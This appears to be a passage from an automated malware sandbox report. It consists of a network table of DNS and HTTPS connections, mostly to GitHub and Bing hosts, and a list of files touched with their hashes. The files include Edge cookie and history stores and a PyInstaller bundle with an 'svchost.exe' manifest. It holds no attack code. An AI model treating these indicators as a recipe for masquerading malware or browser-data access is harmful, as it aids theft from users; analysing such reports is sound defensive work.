| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 185.199.109.133:443 | avatars.githubusercontent.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.113.22:443 | collector.github.com | tcp |
| US | 140.82.113.22:443 | collector.github.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 22.113.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| BE | 88.221.83.217:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 217.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 45.19.74.20.in-addr.arpa | udp |
| BE | 88.221.83.217:443 | www.bing.com | tcp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.53.16.96.in-addr.arpa | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.201.50.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ea98e583ad99df195d29aa066204ab56 |
| SHA1 | f89398664af0179641aa0138b337097b617cb2db |
| SHA256 | a7abb51435909fa2d75c6f2ff5c69a93d4a0ab276ed579e7d8733b2a63ffbee6 |
| SHA512 | e109be3466e653e5d310b3e402e1626298b09205d223722a82344dd78504f3c33e1e24e8402a02f38cd2c9c50d96a303ce4846bea5a583423937ab018cd5782f |
\??\pipe\LOCAL\crashpad_4044_BKDORYCLJEYWVFHP
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 4f7152bc5a1a715ef481e37d1c791959 |
| SHA1 | c8a1ed674c62ae4f45519f90a8cc5a81eff3a6d7 |
| SHA256 | 704dd4f98d8ca34ec421f23ba1891b178c23c14b3301e4655efc5c02d356c2bc |
| SHA512 | 2e6b02ca35d76a655a17a5f3e9dbd8d7517c7dae24f0095c7350eb9e7bdf9e1256a7009aa8878f96c89d1ea4fe5323a41f72b8c551806dda62880d7ff231ff5c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ce386fa0a7a99620d2c111a51f2ab86e |
| SHA1 | cc3436b75102314bc13ec3269b348ae7b5af34c5 |
| SHA256 | c1303601b4037470644dadeff70d658ea621fbf921fc6f088e7d6fb426a5db69 |
| SHA512 | 613b1af9526c49b932362ded94a1dbb3ac447e0d8751051225ff3c44635a161168452e0ad356259e793cdb3e5111f20201f2270b4cf899f951acacf6baeab0e0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\Downloads\Unconfirmed 207892.crdownload
| MD5 | fcd43ec0e853fdc49804259d9e0d1cf8 |
| SHA1 | 9e31403b4be7b991961fc2c85aeb3b72f1aab23d |
| SHA256 | c914eed114c9b2ee359c2e7d6783d79658c7fa65fbba815e55e94fe945093410 |
| SHA512 | a558888493bddd9e0679693bda114965c721d77a7dec2f95673c430ecc6ecb2a56c9ca681bc38977ee37218585551f850bf5e256e4fb29c3a982031b88c69f60 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 6db38442a5bfa8b66005c05bbf91a8b8 |
| SHA1 | 90b36503e1e84fa26fc4be217b97b29443586b16 |
| SHA256 | e27b579051e47bab51d44f9e0f31458cf2db2975d9715f087a8d94d43386ee9c |
| SHA512 | f76050f4f774ab61028007b24e71b3c77cab6e8ee6970d6ba50ffb8f46d2f0060f0664c3c9ab6827dc436bb03d323b94660b7121f360ea8c3a35da27b6556b15 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 30667c7f4c19b2fc15349e0fc70bb873 |
| SHA1 | e0279624eeb8d52a8393408f5727f82a24f28740 |
| SHA256 | 660f81ee4576587120ce0143959880df34ba0647a2e5815e06226fbcab65224e |
| SHA512 | 904b51981cdb98bccdf26f46fb60fdf8d4551dd2e595a06d2e64b7709f3668c8b7916b72715d4020eff73f979f687c445f120403ceeeec62dfd53424828861ff |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 8e5969dd37c99dd2f217b4bba40b7833 |
| SHA1 | f121666f41e7537c61e369c4f644d0fdd1353d22 |
| SHA256 | c8e5c7b069fc48151e83d4575d02c94bdb8db0a89f55418a26285873c8c56ba0 |
| SHA512 | 65785cd9c9521c018c3cfaf11e29b877cf0b8faa24ebafd93f7a79d73475a23a651b9871d3a6d1e1316bf05373e60d93fdcc0abeb6f5da5bd1409ffe2e7aead8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | dacd32183385fde2a06a1436740f2976 |
| SHA1 | 7604d258c57d123e17e4f332dfa1d5b568a93549 |
| SHA256 | ac399e16c19c992d1d124b1a155afb28f3327080d316e3634b17e1e8a055dfd9 |
| SHA512 | 205f73895517968ade7cd847aef1f12bddecced326df8862ac6c9a9ffcc9b43a86f4402fd36beb73dadd51c4e25dbee9b6ac8fde6f101f013c2b9478cdcc9f52 |
C:\Users\Admin\AppData\Local\Temp\_MEI35562\svchost.exe.manifest
| MD5 | dee2c6246611adaa4d04b66f179f4a7a |
| SHA1 | 9aa4cfdc6179c02a74853f68ca65de53a46eec9d |
| SHA256 | 1df11ae29c8f6fe03f840f79625d504bb6895d24621e324fc82ac91e946fd431 |
| SHA512 | f51b705f8b875b763c74bc65370198c657b8c74a3716b53d81cad7cc0a892939dabcac332c27db2661c4f7fcf7a6cea478f84906fe2fe1e00240519d297ea76b |
C:\Users\Admin\AppData\Local\Temp\_MEI35562\python27.dll
| MD5 | 131244d3741081a1a59c0bb13bf80bc5 |
| SHA1 | 8b0cd9379d5055c82a4b065caea5f65c67dc003b |
| SHA256 | bfe564310e31cf4eeb1e08f93297a7280e4c3fb4ecf8be2884a1ceab67e05a3f |
| SHA512 | 2aa27d36fb6bcc37359aa3dbf3f27ab583d95202ddcbc81e1ddea25b2b3ce2ef6fee701896269404becce2eb0e8e72f171f32b53765177a50774c1d7c392667a |
C:\Users\Admin\AppData\Local\Temp\_MEI35~1\win32process.pyd
| MD5 | 1fe1a15be6a20763adfe13ac51aecfbb |
| SHA1 | 057a117bbd8f2792e16e877832cf4bc5d1776692 |
| SHA256 | 4d8aafe841cd3c2d6c31469e47b76956e373ace9f10d9a84c903545fd98f8a9e |
| SHA512 | 029e9d2a97ede4024f38a683589112c74c652d131fe78e9e01686a5d9e783a29db4a1970d5c2a5fc61b74c2d76e5f7a2e82056462502297d1f432b710a69cbec |
C:\Users\Admin\AppData\Local\Temp\_MEI35~1\pywintypes27.dll
| MD5 | b7c9705250f63820ad8b47e87e2d15dc |
| SHA1 | 723cfd49de3a3cc6c89e4ecb60a19e1997cfcd22 |
| SHA256 | 94e42f65ea59cdf1398644dc8a18ce6333bed65edc6f1b33b73a4f645fca040f |
| SHA512 | 74d67f907b21125e617fb4d23956248496f666e8eb55f23215f57e504b249ae8b30428929137551bebcbf742ab7f5476ab58325941ce89b30af83b5c0af011d2 |
C:\Users\Admin\AppData\Local\Temp\_MEI35562\win32gui.pyd
| MD5 | c93ce420e87cfa52f5019caffa8e8428 |
| SHA1 | dc8216a9db6923b13dae12a975f43d099984d45a |
| SHA256 | b319167da761967f100668b144ad1f3004bdc760a99a4642b169458f3b586b44 |
| SHA512 | 65df51dddc6b7efb7b972a5681ca437d870deb3857cb8923d6195adb9a1feb61deeac95ea07d83977e03e79f7d856ba22da9751a071bf95d59d10a6b797e6449 |
C:\Users\Admin\AppData\Local\Temp\_MEI35~1\_socket.pyd
| MD5 | f9b160a08dacc271b8b7ad1516d88330 |
| SHA1 | 762698430bbfe5b5d52756b969fe7a757ce07a33 |
| SHA256 | 7ddf74ac35a6dfa24c4f96acd058829fc934b798af910ed2a58d9b8ef8a26511 |
| SHA512 | 5f1666a63e1a5a9d788556899d2a1ddeb28a33c4aac9273c706c35fe7ff3feeb0138a2e75e6f9540560f8df5717a9b0e264684f27c13277db632cfccd506aa2a |
C:\Users\Admin\AppData\Local\Temp\_MEI35~1\_ssl.pyd
| MD5 | 16bbb7e72d190e6712d923dbc854a45f |
| SHA1 | 2913c4d3b9f0c708845252e863518d9bdaea5aac |
| SHA256 | a9d0fdc952d5bb1ba7f809a6fa7ba9418414d5a10f4a7d429f680eac22d6a322 |
| SHA512 | 906f16928e322addf52aad4e21265650b82853ae73e39ec60a80effd205d75bf5b4183bac1cd55f853bbcfdc84c4fb2694acff2098c32d93175aeefd3cdff5c9 |
C:\Users\Admin\AppData\Local\Temp\_MEI35~1\bz2.pyd
| MD5 | a1950d15ae7fadd5b203639f3965f690 |
| SHA1 | dd09dfee5577feca2ce25d9cc5091933ca580adb |
| SHA256 | baa75ad550784c5c5bada51cb565784a04f267fad708e6611b0cc3dc6ae0c1ed |
| SHA512 | b0ca2e27e0fa77a58c7a56d66bf01fca152cb784e11ced7e247b092864f5a81b6cde353adfe58193d660f9be7b37c8076a6ca75390d4b34228b5359a3a884c88 |
C:\Users\Admin\AppData\Local\Temp\_MEI35~1\psutil._psutil_windows.pyd
| MD5 | c455de76dd12b1a015c2639072e40c91 |
| SHA1 | 271566571a40c4d6d9878e6ff81bd4fd8361f064 |
| SHA256 | 01e03adf7f034d55b3ed665649cc8d2bb1edc8c2562bd8081c4f1a7087911b19 |
| SHA512 | eaee2ffde42e1b1bf505f8767831f87caaded49d20917d65a7553b7e9b2975ccbc8e0d6523f58ba7c25ce92a52f892633fcd062b082d2fe34ea8e46977f0e813 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 21f516584fe90adae377c0de7aa39a1f |
| SHA1 | a17d614c94f564a9f905b493bf2464fdee955064 |
| SHA256 | 46d07b18e768ba7a9b164d431814ccac955a5eaf5ab406c363ac75aa03b80475 |
| SHA512 | e1cbfbbbdbea4dd84a34e9a506e4eff3b4e16546c95f2807999c7ae913623034d6cc78d90ab78009ef0a9312ba82e8f9dbb65780c72e4a26b0689277d7e7a357 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b93382c6d9facdc7d14b443181558841 |
| SHA1 | 120f90d235ee10d1408b7fe258ed67777136adec |
| SHA256 | 6b460b7c0d9bc1c66650aea5a3f5ba0d6841b91b104138f8c49c2c23a296830c |
| SHA512 | 8691165b917ed2e48168a0dd501e3cde1560b8e231f944b7c209c42e4a23b1e93f953b4417feb6c95044728d50821c64865f609269a7a0fff7524e147a267b52 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 46fa4f5f7344089589d117bd7599b3a9 |
| SHA1 | b6cc1fe19e527d4a372c97e4d195ed94eee40030 |
| SHA256 | 223280d95a13f1af6af06459bbf230874500c212a2e16f63914eff3f22e8b57a |
| SHA512 | 6b680aedde7e806802652aab9ab31cb21438bc8756b063955e6f03bbbdf1273f7d47c40ec1a19fe27537afeb8d6cc219a246d31f7c6822b481649fe296e2a45c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt
| MD5 | 50f9406be087808527fb38b487f17aeb |
| SHA1 | 24869daac58a3d3b5aa84f880a0ca77e3633c432 |
| SHA256 | a278e0fa6461cc8384bcff420d5d0c30c77f7ea4ebdc9ce89ac0605d6fd885a8 |
| SHA512 | 7f22e743e87eb8009f8ac3b57c6b0c457ff8773ba6ba70c1e2ab0105b81898d4366384cdadcc4fd87174b7959c6651964e0c4abf4b9ad2b603f4660ccf5f6c55 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Browser
| MD5 | a397e5983d4a1619e36143b4d804b870 |
| SHA1 | aa135a8cc2469cfd1ef2d7955f027d95be5dfbd4 |
| SHA256 | 9c70f766d3b84fc2bb298efa37cc9191f28bec336329cc11468cfadbc3b137f4 |
| SHA512 | 4159ea654152d2810c95648694dd71957c84ea825fcca87b36f7e3282a72b30ef741805c610c5fa847ca186e34bde9c289aaa7b6931c5b257f1d11255cd2a816 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
| MD5 | 838a7b32aefb618130392bc7d006aa2e |
| SHA1 | 5159e0f18c9e68f0e75e2239875aa994847b8290 |
| SHA256 | ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa |
| SHA512 | 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies
| MD5 | b550823bb03e4a8b91eaab44d4356f1c |
| SHA1 | 49f9661821671a666425725bc55c7672b119d656 |
| SHA256 | b250edc7c58b0e89336dd69966073980e4fd0e75964ed24068923493a9998b84 |
| SHA512 | 44080c5e2d42fc097cfa82e5bc71a410e152a642100966dd1e982f0e2ef46441dfa604853e72aa2e340aca33e1e034d7d190af4d4945aec9b8924d530bffd663 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History
| MD5 | 87e8df0f08e52101aaa94ca9b9b36c7c |
| SHA1 | edeb60ade91808ac14f210ebe12cd703275a1c77 |
| SHA256 | 2cbdb2c97fe820e17763c235ac03feca116b815e7832dd354433ec6bec05b830 |
| SHA512 | ddef8bf476506dcb3f190576cf016d7fb38f444b8c0eb60ba0f5ac286b2a1a5e0f768cb36b90f47117b717ddab3e8b8a157518b5e5905a71a697eebdc234e23f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db
| MD5 | 3b3d49f283c5d6ba91570c57d98eb64c |
| SHA1 | 5346d2b983e99930006fb49eb4c4bca983e9fd5e |
| SHA256 | 998bba686c4e8d14f88b83e41fa81d0523b33dbc0030ede745ac6f969911263b |
| SHA512 | 2c58eecfe2728892d925fd37ce5477bba821b656031dd89f5e1e6dbadf6ac00b9b32fd72fa1d972db892d480d784b5fa1bea122f09d8b8224f0d8762ca8ee019 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache
| MD5 | 48f07dcf46e403d0e8833ec702b23634 |
| SHA1 | 56418362cb93dea7cf8b110dca4aecc5963598fd |
| SHA256 | 8f809bddc3adaceb6d29b175341ccba7d5ec8a7362e6d6f19ac76e985cbc47ee |
| SHA512 | cf33ec74e8546cc57eea22bbf80369f17d07931f30c72ae43a77709715abd5de481bb0ec371ce14842c387ccebf93e0cf547a1f07032559cce09a5e986ac3d6e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Favicons
| MD5 | a47093402a104de8fd310798888b16b9 |
| SHA1 | 79007031f2fc6ad99d1bfb3f924c6c29f27a9279 |
| SHA256 | 5e9b31918fd0382f9b83db9e8aceb700e34bf678b8f6a74c0ab227d8a0a7ca0f |
| SHA512 | 48757f5c706f6cace3e6d91ac81b77c7ce96665f9805a79ebcb7b42304225b7c46283e9a9650be53af8c349e8217014733fc753fd1cb70bb74a51d6d0935ebfb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007
| MD5 | 9a21c78c3cfb129f395919dfb35bd678 |
| SHA1 | 65e66cd7c7dbae0fa6f5346a1413414bae531d06 |
| SHA256 | f336b0f4882f58bcc4ffcea8aeb064c3f2999836ccb269eecc140bb401bbdf23 |
| SHA512 | 8005c6594dd227e5dcd0e1a9dca2757c1e94ac1ee01f23f01130900f67382b5123b265ecd7f79ec01914ad8d8f743318fa2ba6fa70fa18a5597a9f492ccde04c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006
| MD5 | 8b2813296f6e3577e9ac2eb518ac437e |
| SHA1 | 6c8066353b4d463018aa1e4e9bb9bf2e9a7d9a86 |
| SHA256 | befb3b0471067ac66b93fcdba75c11d743f70a02bb9f5eef7501fa874686319d |
| SHA512 | a1ed4d23dfbe981bf749c2008ab55a3d76e8f41801a09475e7e0109600f288aa20036273940e8ba70a172dec57eec56fe7c567cb941ba71edae080f2fdcc1e0c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005
| MD5 | ec52a780fb628756883539d1daf3f68f |
| SHA1 | cbfa20c69acbb5b75a16c81d12127be1ebcd47ae |
| SHA256 | 4db0f4e2991abbcf13c1fa0094672e2b3f453797e271a846a0eb3b4ffd6ebfce |
| SHA512 | 5191b287f7d15d882ced2bba912a327c351a29dfc4b457172f3f5886b60eb6d7683c6ca51c9734cc0385da9514d271d674313c049db5b0adec1b05a1a1ca29fd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004
| MD5 | 675c3cc9eeb511d43db6635bf1b515f9 |
| SHA1 | b5a3bc916093bf35af9cb26f45f79c229db4d70b |
| SHA256 | 827caf07904c9ca524acf5d97bcaf1f11c84ffdb1fc2e7f683e1dc80648ed58c |
| SHA512 | 6e82a416ca6d79ed2402382326d8621d9828b420daad5ff0a93f2de13598213b52ed7fc9f6a59dc6bb71bfb6a1bb13be3d54581e2d26ecb0dbf0bb2ecc894197 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003
| MD5 | 54a5ca74a6d9c531ec2c366edd7be658 |
| SHA1 | c4d01c1cfd3c190fd9ac918eb5a3bebaf41b29d6 |
| SHA256 | 9f3cb2edebc4754956da013e3e4fa9735d5d5cdbd5f02a7c9869a8ada5bf190d |
| SHA512 | b8670bb7a6496e8e6a09dbcb974ace55451be9c937f178803891129bd33f9545119924dffffa84f13dc87a753df0e9d66e104e5df72f9d6911c619c835d78e2d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002
| MD5 | 8120b74339adf2c06b6fafd4ce8bf1e3 |
| SHA1 | f9fff0063c05f035dee5b9e517f4d79ce6e487d5 |
| SHA256 | cebcfb07b88ae69974df7a8ffb49b94bffa35f9804bdc97b74be9fc709ea1c73 |
| SHA512 | 79fe6cadc94fc0e1d037c3e466c9cf67c486bde99f6d62126758c49b41c9891f218d668a5a6fb55882c1cb430bd333156539f52bb4449df43939546aa9c8b378 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001
| MD5 | 3dae5c2f86a199c670f1edd911b11fc3 |
| SHA1 | f7e9f678edf01cc5d4e933f465745e354090b89f |
| SHA256 | 77929e8353b974512a6d3d4b6605640169482acdbf98c9f93bce15d1a4950256 |
| SHA512 | 10dcc494fc0141ba8de84d198c23c727746bc2731627ee8bc34a74de160d91fa6032b91ab4d0c684841f4b1a3c7499ac8e00bab3a50e851c50b3fd5e83c00215 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3
| MD5 | 7d04d599798c564019a0297d7883ac73 |
| SHA1 | a833a431e3b14547d5607473a6437dad593a10a7 |
| SHA256 | 7cf49a0f1cf00f4bbb98716ca71830746159dcd10b337898673d37b0046ee1f3 |
| SHA512 | 1a6fd3226340d71a339e7276efe6b027a4f6297f91f46bdab650dce14db57d9cc2a68d7ff1ebf90152635c54171eda1874e618f9a8b1620781ae3684896f72e5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_2
| MD5 | 8fe25a7a10e7478946e1c57f634d9592 |
| SHA1 | bd03febe0cda8954ff44883f9e9c4807b6c1e50e |
| SHA256 | 1d9f946ee50643a2150bb1367ee977b4e010eda40fcc1364e2478db91000f1c8 |
| SHA512 | d4ae3a505595046b013f12cf3f64d208c0b9381a35520437a16dfefd46ccd8021b7ce5a9a2b9227fa7edd09f441ab8bf5f42c12d231d65101d3e75828ccfef92 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1
| MD5 | 9a0487450d9a8b45793b8cb0e78c87ed |
| SHA1 | dc020b69a67586f085c0751d2d750eaa344c83ff |
| SHA256 | 1514d587b20c3c2064c4246cd1cc9e69c2bd0dabc7955ac677733eb75bde167d |
| SHA512 | 8255e36e57bc7908444396e5105526e24bee7f97b112b6229ae2687129010f1b138e085d0338f430c0163410d254f3d6239c383e85e9b0b589c3a4148021ecfa |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0
| MD5 | 1e9785d107cb65d717e5d8ade3e1e37d |
| SHA1 | cbc44746e770d2ee53c1205664eef6eec72ab103 |
| SHA256 | 0831b736e3f9e293a277f84a2204733e46da8c15c9e6ea3ad5b79d5319d9413d |
| SHA512 | ac32263ea2b276802c210df43e97545328da78d7092d7419bc7a321ce25f3fb465df4dc11c1ac2468beac8af356d85f9b78024b24fa6802614095797b329d628 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\WebAssistDatabase
| MD5 | 935462e84c85ba3725f3e006eecdfa94 |
| SHA1 | 1e43d1054ed6a489abf03ddcb0538e677f3b1c6d |
| SHA256 | 2c6bbba912cac1d0d4b6c63aaba9f744d026b0089e7952d904755e49de993a2d |
| SHA512 | e717184db37b9f6a80f1f17801941e7e50079fe9b694ee553072de99888e343fb1b3c9acc86e8973c09df5afc91722daeb8b2274633833ab8d60ddfaab581292 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links
| MD5 | d0737e7b5d3bf2e027231e1e54b0ae1a |
| SHA1 | f6e86cbc6f69c47e7764534e1c84ef4025702a9d |
| SHA256 | 9e4f4bcd2cce3c1336aeacf3a16b02d49298784d9f1d9e90062bf29fc0f320af |
| SHA512 | 2a401ab0142410154566ac5527370f95b562a1ee0ca5e81ba19fd2b57a368b7e138ccfaa312b8c133e975bfe3c96ce909e07040f7d1d2ca8b678d04cd51d4e62 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 0d53dfc85c3bd8a972e29a28b2c8b16d |
| SHA1 | f18b578f5a3a00f0f84acb3f009d1c85afec3e77 |
| SHA256 | 5f5cd173d711d74c1d4e1beff28ae598254c4a652364a394a7ef30bb58b3db80 |
| SHA512 | 14cb89b8a609cfb61a94c6f57cc8be269853b9b49d5137d8e7460f43face8836e53f12a87574738bafa74ab63f993828e5c16a20927927cadb4d61d29617c7ed |
C:\Windows\System32\Recovery\ReAgent.xml
| MD5 | 4666c057a7c38ec27cf6ccd9927f1f84 |
| SHA1 | 34aca34887404b2f3c7a8a1d64868088f7fe0225 |
| SHA256 | 6a9927d4a5acdaef4f6afad88edc6028b48c6df10c1170f587f22f45281fd556 |
| SHA512 | a1023c32519cdda1b1e9d0b9fd4be49307ef3e0d566b165a71b0f1e3592ff87bcc0ec5a4a45f64dd0957e5d5770426280d71d2e65c5ea70ce3a7aed59b47b800 |